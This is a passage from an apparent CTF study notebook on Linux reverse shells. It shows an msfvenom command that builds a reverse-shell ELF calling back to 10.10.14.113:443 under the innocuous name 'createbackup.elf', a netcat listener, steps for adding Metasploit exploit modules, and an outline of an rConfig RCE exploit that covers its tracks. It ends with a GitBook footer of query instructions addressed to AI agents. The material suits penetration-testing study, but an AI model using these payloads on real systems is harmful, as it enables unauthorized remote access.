> For the complete documentation index, see [llms.txt](https://capcap-1.gitbook.io/capcap/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://capcap-1.gitbook.io/capcap/readme/ctf-modules/vulnerability-assessment/shells-and-payloads/reverse-shell/linux-reverse-shell.md).

# Linux Reverse Shell

Reference: <https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#tools>

<https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits>

### MSF:

#### Linux Payloads

Staged (Sends a small stage to be executed, then calls back to download the remainder)

* `linux/x86/shell/reverse_tcp`
* `linux/x86/shell/reverse_nonx_tcp`

Stageless (Sent in its entirety across the network without a stage; better for low bandwidth/latency)

* `linux/zarch/meterpreter_reverse_tcp`
* `linux/x64/shell_reverse_tcp`

### MSFVenom Payload Creation

List all available payloads:

```bash
msfvenom -l payloads
```

Linux Payload Creation (ELF format):

```bash
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf > createbackup.elf
```

### Catching the Payload (Listener)

Set up a Netcat listener on your attack box to catch the connection when the target executes your stageless payload (applies to both Linux `.elf` and Windows `.exe` files):

Bash

```bash
sudo nc -lvnp 443
```

Things to keep in mind:

* What distribution of Linux is the system running?
* What shell & programming languages exist on the system?
* What function is the system serving for the network environment it is on?
* What application is the system hosting?
* Are there any known vulnerabilities?

You won't always find the exact exploit you need by just typing `search <app_name>` in MSF.

| **Step**                 | **Action / Command**                                                             | **Details**                                                                                                      |
| ------------------------ | -------------------------------------------------------------------------------- | ---------------------------------------------------------------------------------------------------------------- |
| 1. Locate MSF Directory  | `locate exploits`                                                                | Find where Metasploit stores its modules locally (typically `/usr/share/metasploit-framework/modules/exploits`). |
| 2. Download Module       | `wget <github_raw_url>`                                                          | Download the Ruby script (`.rb`) from the Rapid7 GitHub repository.                                              |
| 3. Place in Correct Path | `cp rconfig_rce.rb /usr/share/metasploit-framework/modules/exploits/linux/http/` | Place it in the directory structure that matches its function (e.g., Linux HTTP exploits).                       |
| 4. Reload / Update       | `apt update; apt install metasploit-framework`                                   | Ensure your local package is up to date and reload MSF to register the new module.                               |

#### 3. The Anatomy of an RCE Web Exploit

1. Version Check: Validates the target is running rConfig 3.9.6.
2. Authentication: Logs into the web app (requires valid credentials).
3. Payload Delivery: Uploads a malicious `.php` file masquerading as a legitimate upload.
4. Execution: Triggers the uploaded `.php` file via a web request.
5. Cleanup: Deletes the `.php` file to hide tracks.
6. Connection: Catches the reverse shell on your listener (Meterpreter).

### Next step

Upgrade the shell after the connection lands.

See [Fully Interactive TTY](/capcap/readme/ctf-modules/post-exploitation/fully-interactive-tty.md).

### Reference

* [Payload All The Things reverse shell cheat sheet](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://capcap-1.gitbook.io/capcap/readme/ctf-modules/vulnerability-assessment/shells-and-payloads/reverse-shell/linux-reverse-shell.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
